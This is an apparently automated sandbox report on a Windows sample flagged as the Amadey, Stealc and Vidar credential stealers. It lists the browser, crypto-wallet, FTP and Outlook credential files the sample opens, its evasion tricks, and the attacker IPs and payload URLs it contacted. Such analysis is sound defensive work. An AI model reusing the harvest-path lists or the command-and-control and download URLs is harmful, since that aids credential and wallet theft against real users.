Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00417420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004172F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004174D0

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 9.2.explorti.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.axplong.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.userAAKKKEBFCG.exe.20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RoamingIJEGHJECFC.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.axplong.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.explorti.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.axplong.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000003.2276983126.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2347124654.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2304525460.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2347246471.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2318152598.00000000005A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2317440322.00000000005A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2277575400.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2304691515.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2268996704.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2625588301.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2242381283.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3307066431.00000000005A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2283337315.0000000000341000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2630631492.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3307509620.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2309282789.0000000000021000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2718500578.0000000002567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2994798598.000000000263A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 4744, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: passphrase.json
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe, 00000000.00000002.2496187977.00000000027A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 185.215.113.16fons\AppData\Roaming\Binance\simple-storage.json
Source: file.exe String found in binary or memory: Ethereum
Source: file.exe String found in binary or memory: file__0.localstorage
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: 8e8f4571c5.exe, 0000001C.00000002.3338850451.0000000001FEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP
Source: 8e8f4571c5.exe, 0000001C.00000002.3307370321.0000000000622000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 8e8f4571c5.exe, 00000018.00000002.3338463665.0000000001FE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP4
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2718500578.0000000002567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2994798598.000000000263A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 4744, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C0C40 sqlite3_bind_zeroblob, 0_2_6C8C0C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C0D60 sqlite3_bind_parameter_name, 0_2_6C8C0D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7E8EA0 sqlite3_clear_bindings, 0_2_6C7E8EA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483424 Sample: file.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 81 www.youtube.com 2->81 83 support.mozilla.org 2->83 85 18 other IPs or domains 2->85 101 Multi AV Scanner detection for domain / URL 2->101 103 Found malware configuration 2->103 105 Malicious sample detected (through community Yara rule) 2->105 107 17 other signatures 2->107 9 file.exe 39 2->9         started        14 explorti.exe 2->14         started        16 explorti.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 95 185.215.113.16, 49705, 49727, 49728 WHOLESALECONNECTIONSNL Portugal 9->95 97 85.28.47.31, 49704, 49734, 80 GES-ASRU Russian Federation 9->97 73 C:\Users\user\AppData\RoamingIJEGHJECFC.exe, PE32 9->73 dropped 75 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->75 dropped 77 C:\Users\user\AppData\Local\...\random[1].exe, PE32 9->77 dropped 79 14 other files (10 malicious) 9->79 dropped 123 Detected unpacking (changes PE section rights) 9->123 125 Detected unpacking (overwrites its own PE header) 9->125 127 Tries to steal Mail credentials (via file / registry access) 9->127 139 7 other signatures 9->139 20 cmd.exe 1 9->20         started        22 cmd.exe 1 9->22         started        24 WerFault.exe 19 16 9->24         started        99 185.215.113.19, 49726, 49731, 80 WHOLESALECONNECTIONSNL Portugal 14->99 129 Creates multiple autostart registry keys 14->129 131 Hides threads from debuggers 14->131 133 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->133 27 8e8f4571c5.exe 14->27         started        30 9fa327eb6c.exe 14->30         started        135 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->135 137 Binary is likely a compiled AutoIt script file 18->137 32 firefox.exe 18->32         started        34 firefox.exe 18->34         started        37 WerFault.exe 18->37         started        39 WerFault.exe 18->39         started        file6 signatures7 process8 dnsIp9 41 RoamingIJEGHJECFC.exe 4 20->41         started        45 conhost.exe 20->45         started        47 userAAKKKEBFCG.exe 4 22->47         started        49 conhost.exe 22->49         started        67 C:\ProgramData\Microsoft\...\Report.wer, Unicode 24->67 dropped 141 Detected unpacking (changes PE section rights) 27->141 143 Binary is likely a compiled AutoIt script file 27->143 145 Hides threads from debuggers 27->145 51 firefox.exe 27->51         started        147 Detected unpacking (overwrites its own PE header) 30->147 53 WerFault.exe 30->53         started        55 firefox.exe 32->55         started        87 youtube-ui.l.google.com 142.250.186.46 GOOGLEUS United States 34->87 89 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 34->89 91 4 other IPs or domains 34->91 58 firefox.exe 34->58         started        file10 signatures11 process12 dnsIp13 69 C:\Users\user\AppData\Local\...\explorti.exe, PE32 41->69 dropped 109 Tries to evade debugger and weak emulator (self modifying code) 41->109 111 Tries to detect virtualization through RDTSC time measurements 41->111 113 Hides threads from debuggers 41->113 60 explorti.exe 41->60         started        71 C:\Users\user\AppData\Local\...\axplong.exe, PE32 47->71 dropped 115 Antivirus detection for dropped file 47->115 117 Detected unpacking (changes PE section rights) 47->117 119 Machine Learning detection for dropped file 47->119 121 2 other signatures 47->121 63 axplong.exe 47->63         started        93 prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 ATGS-MMD-ASUS United States 55->93 65 firefox.exe 55->65         started        file14 signatures15 process16 signatures17 149 Machine Learning detection for dropped file 60->149 151 Tries to evade debugger and weak emulator (self modifying code) 60->151 153 Hides threads from debuggers 60->153 155 Antivirus detection for dropped file 63->155 157 Detected unpacking (changes PE section rights) 63->157 159 Tries to detect sandboxes and other dynamic analysis tools (window names) 63->159 161 2 other signatures 63->161
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.186.46
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
85.28.47.31
 unknown Russian Federation
31643 GES-ASRU true
185.215.113.19
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 prod.ads.prod.webservices.mozgcp.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
youtube-ui.l.google.com 142.250.186.46 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
contile.services.mozilla.com 34.117.188.166 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
spocs.getpocket.com unknown unknown
detectportal.firefox.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
push.services.mozilla.com unknown unknown
shavar.services.mozilla.com unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://85.28.47.31/8405906461a5200c/vcruntime140.dll true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://185.215.113.19/Vi9leo/index.php true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.31/8405906461a5200c/softokn3.dll true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.31/8405906461a5200c/nss3.dll true
  • 10%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown